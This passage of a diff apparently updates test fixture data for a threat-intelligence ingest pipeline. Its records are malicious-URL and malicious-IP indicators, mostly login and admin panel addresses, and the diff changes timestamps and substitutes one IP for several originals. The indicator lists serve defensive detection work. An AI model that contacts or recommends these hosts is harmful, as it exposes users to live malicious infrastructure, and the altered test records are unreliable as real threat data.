'http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:04.196Z\"}", "category": "threat", "type": "indicator", @@ -13372,7 +13372,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386318219Z", + "ingested": "2021-12-13T08:38:40.024089400Z", "original": "{\"created\":\"2020-02-01T02:10:04.234Z\",\"description\":\"TS ID: 55277443231; iType: mal_url; State: active; Org: Fornex Hosting S.L.; Source: CyberCrime\",\"id\":\"indicator--acd84a21-6112-4bbb-9132-fa50a9b7b07c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:10:04.234Z\",\"name\":\"mal_url: http://nextbridge.info/god/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nextbridge.info/god/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:04.234Z\"}", "category": "threat", "type": "indicator", @@ -13391,7 +13391,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://45.86.65.210/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/admin.php", "description": "TS ID: 55277442692; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-01T02:10:18.897Z", "valid_from": "2020-02-01T02:10:18.897Z", @@ -13416,16 +13416,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://45.86.65.210/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "45.86.65.210", - "full": "http://45.86.65.210/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386322567Z", - "original": "{\"created\":\"2020-02-01T02:10:18.897Z\",\"description\":\"TS ID: 55277442692; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d2990eea-f233-4296-b7ea-dc78ad48f1a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-01T02:10:18.897Z\",\"name\":\"mal_url: http://45.86.65.210/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.86.65.210/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:18.897Z\"}", + "ingested": "2021-12-13T08:38:40.024094700Z", + "original": "{\"created\":\"2020-02-01T02:10:18.897Z\",\"description\":\"TS ID: 55277442692; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d2990eea-f233-4296-b7ea-dc78ad48f1a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-01T02:10:18.897Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:18.897Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13476,7 +13476,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386327266Z", + "ingested": "2021-12-13T08:38:40.024100500Z", "original": "{\"created\":\"2020-02-01T02:10:19.383Z\",\"description\":\"TS ID: 55277443285; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--ca6a96b9-60e6-429f-9223-7009c1a5e164\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:10:19.383Z\",\"name\":\"mal_url: http://corpcougar.com/collins/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/collins/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.383Z\"}", "category": "threat", "type": "indicator", @@ -13495,7 +13495,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 92.63.197.239", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-02-01T02:10:19.417Z", "valid_from": "2020-02-01T02:10:19.417Z", @@ -13517,12 +13517,12 @@ "first_seen": "2020-02-01T02:10:19.417Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "92.63.197.239" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386331614Z", - "original": "{\"created\":\"2020-02-01T02:10:19.417Z\",\"description\":\"TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1339e0b5-4398-4de4-9175-e685b6d0f5a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:10:19.417Z\",\"name\":\"mal_ip: 92.63.197.239\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '92.63.197.239']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.417Z\"}", + "ingested": "2021-12-13T08:38:40.024106700Z", + "original": "{\"created\":\"2020-02-01T02:10:19.417Z\",\"description\":\"TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1339e0b5-4398-4de4-9175-e685b6d0f5a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:10:19.417Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.417Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13573,7 +13573,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386336052Z", + "ingested": "2021-12-13T08:38:40.024114200Z", "original": "{\"created\":\"2020-02-01T02:10:39.062Z\",\"description\":\"TS ID: 55277443225; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--5a37e909-b130-4f49-b1d5-f4645a9d4c21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-01T02:10:39.062Z\",\"name\":\"mal_url: http://pom4ekk.myjino.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pom4ekk.myjino.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:39.062Z\"}", "category": "threat", "type": "indicator", @@ -13592,7 +13592,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.62/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-01T02:10:42.316Z", "valid_from": "2020-02-01T02:10:42.316Z", @@ -13616,16 +13616,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.188.60.62/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.188.60.62", - "full": "http://5.188.60.62/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386340370Z", - "original": "{\"created\":\"2020-02-01T02:10:42.316Z\",\"description\":\"TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--9c6caf78-5bcd-4f6f-bc0f-d094a027a811\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-01T02:10:42.316Z\",\"name\":\"mal_url: http://5.188.60.62/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.62/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:42.316Z\"}", + "ingested": "2021-12-13T08:38:40.024121400Z", + "original": "{\"created\":\"2020-02-01T02:10:42.316Z\",\"description\":\"TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--9c6caf78-5bcd-4f6f-bc0f-d094a027a811\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-01T02:10:42.316Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:42.316Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13676,7 +13676,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386345169Z", + "ingested": "2021-12-13T08:38:40.024128600Z", "original": "{\"created\":\"2020-02-01T02:11:07.132Z\",\"description\":\"TS ID: 55277443508; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5f6e0de-d0bb-48f9-931d-5f4fd725a712\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:07.132Z\",\"name\":\"mal_url: http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:07.132Z\"}", "category": "threat", "type": "indicator", @@ -13728,7 +13728,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386349477Z", + "ingested": "2021-12-13T08:38:40.024135800Z", "original": "{\"created\":\"2020-02-01T02:11:07.159Z\",\"description\":\"TS ID: 55277443305; iType: mal_url; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--d2ef46a3-6df2-4cc9-bb15-886dc24d41e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:11:07.159Z\",\"name\":\"mal_url: http://betprognoz.pro/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://betprognoz.pro/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:07.159Z\"}", "category": "threat", "type": "indicator", @@ -13747,7 +13747,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://185.244.151.170/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime", "modified": "2020-02-01T02:11:33.332Z", "valid_from": "2020-02-01T02:11:33.332Z", @@ -13771,16 +13771,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://185.244.151.170/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "185.244.151.170", - "full": "http://185.244.151.170/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386353896Z", - "original": "{\"created\":\"2020-02-01T02:11:33.332Z\",\"description\":\"TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--6c50f1f6-c27a-4484-ac53-728654ba2db3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:33.332Z\",\"name\":\"mal_url: http://185.244.151.170/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.244.151.170/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:33.332Z\"}", + "ingested": "2021-12-13T08:38:40.024142800Z", + "original": "{\"created\":\"2020-02-01T02:11:33.332Z\",\"description\":\"TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--6c50f1f6-c27a-4484-ac53-728654ba2db3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:33.332Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:33.332Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13831,7 +13831,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386358054Z", + "ingested": "2021-12-13T08:38:40.024150Z", "original": "{\"created\":\"2020-02-01T02:11:40.48Z\",\"description\":\"TS ID: 55277443247; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--ede31398-e157-401a-9362-127f5c5983ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:11:40.48Z\",\"name\":\"mal_url: http://farzanatradings.com/fakedon/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/fakedon/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:40.48Z\"}", "category": "threat", "type": "indicator", @@ -13882,7 +13882,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386362362Z", + "ingested": "2021-12-13T08:38:40.024157100Z", "original": "{\"created\":\"2020-02-01T02:11:41.88Z\",\"description\":\"TS ID: 55277443064; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--297cf29f-42ad-44ac-9f04-5156899d5ce9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:41.88Z\",\"name\":\"mal_url: http://q74722vp.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://q74722vp.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:41.88Z\"}", "category": "threat", "type": "indicator", @@ -13934,7 +13934,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386368223Z", + "ingested": "2021-12-13T08:38:40.024164200Z", "original": "{\"created\":\"2020-02-02T01:57:18.343Z\",\"description\":\"TS ID: 55280666668; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--194d8979-3fb6-4ebb-b7b1-d4758be6b32a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-02T01:57:18.343Z\",\"name\":\"mal_url: http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.343Z\"}", "category": "threat", "type": "indicator", @@ -13986,7 +13986,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386373012Z", + "ingested": "2021-12-13T08:38:40.024189Z", "original": "{\"created\":\"2020-02-02T01:57:18.366Z\",\"description\":\"TS ID: 55280666642; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime\",\"id\":\"indicator--7470705a-310f-4fe9-9c2f-02b5eac2ff94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-02T01:57:18.366Z\",\"name\":\"mal_url: http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.366Z\"}", "category": "threat", "type": "indicator", @@ -14037,7 +14037,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386377480Z", + "ingested": "2021-12-13T08:38:40.024195700Z", "original": "{\"created\":\"2020-02-02T01:57:18.451Z\",\"description\":\"TS ID: 55280666607; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--20860e18-16e7-4a9a-a485-7588aaee909b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-02T01:57:18.451Z\",\"name\":\"mal_url: http://calmingvapors.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://calmingvapors.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.451Z\"}", "category": "threat", "type": "indicator", @@ -14089,7 +14089,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386381908Z", + "ingested": "2021-12-13T08:38:40.024199100Z", "original": "{\"created\":\"2020-02-02T01:57:18.605Z\",\"description\":\"TS ID: 55280666626; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--6d90d2cb-9fc8-43a4-b4c0-d9ab027f2268\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-02T01:57:18.605Z\",\"name\":\"mal_url: http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.605Z\"}", "category": "threat", "type": "indicator", @@ -14141,7 +14141,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386386487Z", + "ingested": "2021-12-13T08:38:40.024204300Z", "original": "{\"created\":\"2020-02-02T01:57:19.047Z\",\"description\":\"TS ID: 55280666671; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--ffc26af5-40e7-4157-9d15-cf6048ef86a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-02T01:57:19.047Z\",\"name\":\"mal_url: http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:19.047Z\"}", "category": "threat", "type": "indicator", @@ -14192,7 +14192,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386390785Z", + "ingested": "2021-12-13T08:38:40.024209600Z", "original": "{\"created\":\"2020-02-02T01:57:19.068Z\",\"description\":\"TS ID: 55280666596; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5c4cfe56-5fda-4c2b-9b8c-3d384988c3ac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T01:57:19.068Z\",\"name\":\"mal_url: http://f0392879.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0392879.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:19.068Z\"}", "category": "threat", "type": "indicator", @@ -14244,7 +14244,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386395313Z", + "ingested": "2021-12-13T08:38:40.024215700Z", "original": "{\"created\":\"2020-02-02T01:57:25.701Z\",\"description\":\"TS ID: 55280666633; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--8fdc4cfc-1312-4f6c-99ce-3a0a582a07d3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-02T01:57:25.701Z\",\"name\":\"mal_url: http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:25.701Z\"}", "category": "threat", "type": "indicator", @@ -14296,7 +14296,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386399832Z", + "ingested": "2021-12-13T08:38:40.024219500Z", "original": "{\"created\":\"2020-02-02T01:57:25.838Z\",\"description\":\"TS ID: 55280666656; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime\",\"id\":\"indicator--9d8a164e-4f04-4ad2-a1a5-9c4dea319b97\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-02T01:57:25.838Z\",\"name\":\"mal_url: http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:25.838Z\"}", "category": "threat", "type": "indicator", @@ -14347,7 +14347,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386404381Z", + "ingested": "2021-12-13T08:38:40.024224800Z", "original": "{\"created\":\"2020-02-02T01:57:29.827Z\",\"description\":\"TS ID: 55280666597; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--001b0157-c446-40fd-8e01-136a2cab433f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-02T01:57:29.827Z\",\"name\":\"mal_url: http://f0391832.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391832.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:29.827Z\"}", "category": "threat", "type": "indicator", @@ -14398,7 +14398,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386409039Z", + "ingested": "2021-12-13T08:38:40.024229400Z", "original": "{\"created\":\"2020-02-02T01:57:48.75Z\",\"description\":\"TS ID: 55280666598; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4c7c0429-b6f8-4376-8d84-18d68d212b34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-02T01:57:48.75Z\",\"name\":\"mal_url: http://f0391281.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391281.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:48.75Z\"}", "category": "threat", "type": "indicator", @@ -14449,7 +14449,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386413638Z", + "ingested": "2021-12-13T08:38:40.024233500Z", "original": "{\"created\":\"2020-02-02T01:58:23.948Z\",\"description\":\"TS ID: 55280666593; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4eeed5f1-092b-4a3f-8c54-f5eb87b5a19c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T01:58:23.948Z\",\"name\":\"mal_url: http://f0393735.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393735.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:23.948Z\"}", "category": "threat", "type": "indicator", @@ -14501,7 +14501,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386418357Z", + "ingested": "2021-12-13T08:38:40.024237900Z", "original": "{\"created\":\"2020-02-02T01:58:44.041Z\",\"description\":\"TS ID: 55280666689; iType: mal_url; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--c253cabd-5a52-4b5f-a53f-94ca58ee3f60\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-02T01:58:44.041Z\",\"name\":\"mal_url: http://gerawest.xyz/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gerawest.xyz/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:44.041Z\"}", "category": "threat", "type": "indicator", @@ -14552,7 +14552,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386422835Z", + "ingested": "2021-12-13T08:38:40.024241400Z", "original": "{\"created\":\"2020-02-02T01:58:54.099Z\",\"description\":\"TS ID: 55280666701; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--0bb2320f-9a03-4375-ad2a-10b5d3c41b36\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-02T01:58:54.099Z\",\"name\":\"mal_url: http://f0387404.xsph.ru/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387404.xsph.ru/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:54.099Z\"}", "category": "threat", "type": "indicator", @@ -14603,7 +14603,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386427163Z", + "ingested": "2021-12-13T08:38:40.024246400Z", "original": "{\"created\":\"2020-02-02T01:59:11.446Z\",\"description\":\"TS ID: 55280666697; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--f6198f5d-4056-4b4f-8ab7-d9b82ec4878b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-02T01:59:11.446Z\",\"name\":\"mal_url: http://j1040794.myjino.ru/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1040794.myjino.ru/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:59:11.446Z\"}", "category": "threat", "type": "indicator", @@ -14654,7 +14654,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386431932Z", + "ingested": "2021-12-13T08:38:40.024252500Z", "original": "{\"created\":\"2020-02-02T01:59:24.665Z\",\"description\":\"TS ID: 55280666589; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--60d7cde7-6852-4295-8399-81b21cc74d7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-02T01:59:24.665Z\",\"name\":\"mal_url: http://f0395171.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0395171.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:59:24.665Z\"}", "category": "threat", "type": "indicator", @@ -14673,7 +14673,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php", + "name": "mal_url: http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php", "description": "TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": 